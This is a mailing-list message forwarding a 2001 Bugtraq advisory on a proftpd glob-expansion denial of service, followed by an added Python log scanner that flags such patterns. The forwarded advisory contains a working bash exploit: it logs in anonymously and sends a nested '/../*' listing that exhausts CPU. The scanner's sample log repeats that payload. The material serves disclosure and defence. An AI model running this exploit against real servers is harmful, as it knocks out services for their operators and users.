I'm using proftpd 1.2.0pre10-2.0potato1, tried this vulnerability, and it still affects this version of proftpd. I see that ftp://ftp.debian.org is still using this version, and I think it is also affected.
Thanks,
Didit

------- Start of forwarded message -------
From: "Enrico Kern" <[EMAIL PROTECTED]>
To: bugtraq@securityfocus.com
Organization: http://freemail.web.de/
Subject: Multiple-Vendor-FTP-Vuln. (old?)
Date: 8/20/01 20:20:35

Hi,

I tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on many new Linux distributions. When a user logs in via ftp and types the ls command, in.ftpd takes over 90 percent CPU usage; execute the command 2 or 3 times and the full system hangs up. It also works in console. I wonder why this is not fixed. THIS BUG IS OLD, POSTED ON BUGTRAQ in March 01, but it still works so I post it again.

Affected:
  RedHat Linux 7.x
  Linux Mandrake 8.0
  SuSE Linux 7.2
  FreeBSD 4.3
  AIX V 4.3
  other?

Not vuln.:
  latest Wu-Ftpd
  Windows FTP-Server

Exploit:

#!/bin/bash
ftp -n FTP-SERVER<<\end
quot user anonymous
bin
quot pass [EMAIL PROTECTED]
ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
bye
end

Fix: set cpu-limit for your anonymous user.
-------- End of forwarded message --------
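A defender-side check for the glob pattern described in the forwarded post, added here as an example and not part of the original message or of proftpd: it scans FTP command log lines for LIST/NLST/STAT arguments with deeply nested wildcard components and estimates how many directory reads such a pattern can force. The log line format, the sample lines and the threshold are assumptions, not taken from the post.

```python
import re

# Constructed sample log lines ("date time user command argument"); they are
# made up for this example and are not real proftpd output.
SAMPLE_LOG = """\
2001-08-20 20:21:01 anonymous LIST /pub
2001-08-20 20:21:09 anonymous NLST /pub/*.tar.gz
2001-08-20 20:21:15 anonymous LIST /../*/../*/../*/../*/../*/../*/../*
2001-08-20 20:21:30 alice RETR /pub/README
"""

LINE_RE = re.compile(r"^(\S+ \S+) (\S+) (LIST|NLST|STAT) (\S+)$")
MAX_WILDCARD_SEGMENTS = 3  # assumed policy threshold; tune to the site's needs


def wildcard_segments(path: str) -> int:
    """Count path components that contain a glob metacharacter."""
    return sum(1 for seg in path.split("/") if any(c in seg for c in "*?["))


def glob_cost_estimate(path: str, entries_per_dir: int = 20) -> int:
    """Rough upper bound on directory reads the server may perform: each
    wildcard component multiplies the candidate set by the entries it can
    match, so cost grows exponentially with the number of '*/..' hops."""
    return entries_per_dir ** wildcard_segments(path)


def scan(log_text: str, threshold: int = MAX_WILDCARD_SEGMENTS):
    """Return (timestamp, user, path, estimated_cost) for listing commands
    whose argument has more than `threshold` wildcard components."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a listing command, or an unexpected line format
        ts, user, _cmd, path = m.groups()
        if wildcard_segments(path) > threshold:
            hits.append((ts, user, path, glob_cost_estimate(path)))
    return hits


if __name__ == "__main__":
    for ts, user, path, cost in scan(SAMPLE_LOG):
        print(f"{ts} {user}: suspicious glob {path} (~{cost} reads)")
```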